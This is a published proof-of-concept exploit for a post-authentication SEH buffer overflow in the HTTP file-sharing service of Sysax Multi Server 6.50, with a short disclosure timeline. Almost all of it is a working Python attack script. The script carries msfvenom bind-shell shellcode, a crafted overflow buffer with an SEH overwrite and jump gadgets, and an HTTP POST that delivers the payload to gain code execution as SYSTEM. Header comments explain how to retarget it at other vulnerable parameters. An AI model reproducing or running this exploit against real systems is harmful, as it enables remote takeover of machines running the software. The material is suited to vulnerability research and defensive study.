Sysax Multi Server 6.50 SEH Overflow

`# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit  
# Date: 03/21/2016  
# Exploit Author: Paul Purcell  
# Contact: ptpxploit at gmail  
# Vendor Homepage: http://www.sysax.com/  
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)  
# Version: Sysax Multi Server 6.50  
# Tested on: Windows XP SP3 English  
# Category: Remote Code Execution  
#  
# Timeline: 03/11/16 Bug found  
# 03/14/16 Vender notified  
# 03/17/16 Vender acknowledges issue and publishes patch (6.51)  
# 03/21/16 Exploit Published  
#  
# Summary: This is a post authentication exploit that requires the HTTP file sharing service to be running on  
# Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the  
# service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_  
# in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though  
# the user will need to have permission to delete folders. If the user has file delete permissions, file_  
# will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can  
# be modified to adapt to a users permissions.  
  
import httplib  
  
target = 'webbackup'  
port = 80  
sid = '57e546cb7204b60f0111523409e49bdb16692ab5' #retrieved from browser URL after login  
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm  
  
#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"  
  
shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"  
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"  
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"  
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"  
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"  
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"  
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"  
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"  
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"  
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"  
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"  
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"  
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"  
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"  
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"  
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"  
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"  
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"  
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"  
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"  
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"  
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"  
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"  
"\x83\xd7\xfd\x8c\x3c")  
  
arg="folder_" #can also be changed to file_ if user has file delete permissions  
pid="dltslctd_name1" #Can be changed, though padding will needed to be updated as well   
junk1="A"*26400 #Initial pile of junk  
noppad="\x90"*296 #Place to land from our long jump and before our shellcode  
junkfill="\x90"*(768-len(shell)) #Fill in after our shellcode till nseh   
nseh="\xeb\x06\x90\x90" #Short jump over SEH  
seh="\xd7\x2a\x92\x5d" #pop esi # pop edi # ret RPCNS4.dll  
jump="\xe9\x13\xfc\xff\xff" #jump back 1000 bytes for plenty of room for your shellcode  
junk2="D"*9500 #Junk at the end  
  
  
buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)  
  
  
head = "Host: Wee! \r\n"  
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"  
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"  
head += "Accept-Language: en-us,en;q=0.5\r\n"  
head += "Accept-Encoding: gzip, deflate\r\n"  
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"  
head += "Proxy-Connection: keep-alive\r\n"  
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"  
head += "Content-Length: 1337\r\n"  
head += "If-Modified-Since: *\r\n"  
head += "\r\n"  
head += "-----------------------------217830224120\r\n"  
head += "\r\n"  
head += "\r\n"  
head += "\r\n"  
head += buff  
  
conn = httplib.HTTPConnection(target,port)  
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)  
  
  
`